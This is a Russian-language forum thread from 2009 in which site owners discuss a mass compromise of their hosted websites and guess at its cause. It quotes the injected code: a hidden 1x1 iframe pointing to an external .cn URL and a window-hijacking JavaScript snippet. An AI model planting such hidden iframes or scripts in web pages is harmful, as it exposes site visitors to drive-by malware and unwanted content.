Взломали... Вопрос откуда?

Во всех index.php и большинстве инклудах появились вот такие строки:
<html><body><iframe src="http://litedownloadseek.cn/in.cgi?cocacola26" width=1 height=1 style="visibility: hidden"></iframe></body></html>

По логам ничего. По ftp логам тоже ничего, мой ip и ip хостинг провайдера, они перенос делали.
Хостинг mchost
У меня облысение уже началось.... по всем сайтам у меня тысячи indexных и инк. файлов, придется все перегружать

скорее всего ломали сам хост.. ща у многих подобные сюрпризы..

или зверьё в компе у тебя. ща эпидемия какой-то шнягой

Причем это не только у меня одного... в сети на форумах тысячи таких жалоб, причем взломаны сайты со статическими страницами... неужеле уязвимость в apache или php???

я у Neska тут с форума похожее видел. может он знает.

DrugsFan (23.01.2009/22:11)
или зверьё в компе у тебя. ща эпидемия какой-то шнягой

с Linux/Ubuntu лил давно уже, и все работало до сегодняшнего вечера, а я на ftp даж не заходил два дня уже.

Икс рэй, мне ли тебя учить, удали тот файл который редактировал, и верни стандартный, всё восстановиться

Вполне возможно что это вирус.

X-ray, Nesk точно знает в чём дело, вот:

11. DrugsFan[93](On)Отв|Изм
23 Янв, 14:35
Nesk, в wap синтаксическая ошибка. Вот такая шняга в конце кода после </html>:

<script language="JavaScript">
12: function y(){self.focus()} self.moveTo(0,0);self.resizeTo(screen.availWidth,screen.availHeight); y();
13: setInterval("y()",300000);
14: </script>

О.о
12. Nesk[400](Off)Отв
23 Янв, 18:14
DrugsFan, и не только в вап была... во всех индексах корневых папок и в корневом индексе... На сайте был вирус... правда не зловредный.. Просто открывал окно на порно сайт.. Меры приняты.. Сейчас все чисто..

Шамиль (23.01.2009/22:19)
Икс рэй, мне ли тебя учить, удали тот файл который редактировал, и верни стандартный, всё восстановиться

ГГГыыы, посмотрел бы я как ты это зделал если у тебя таких файлов было тысяч 5 среди 50000....
взломано 4 домена со всеми субдоменами....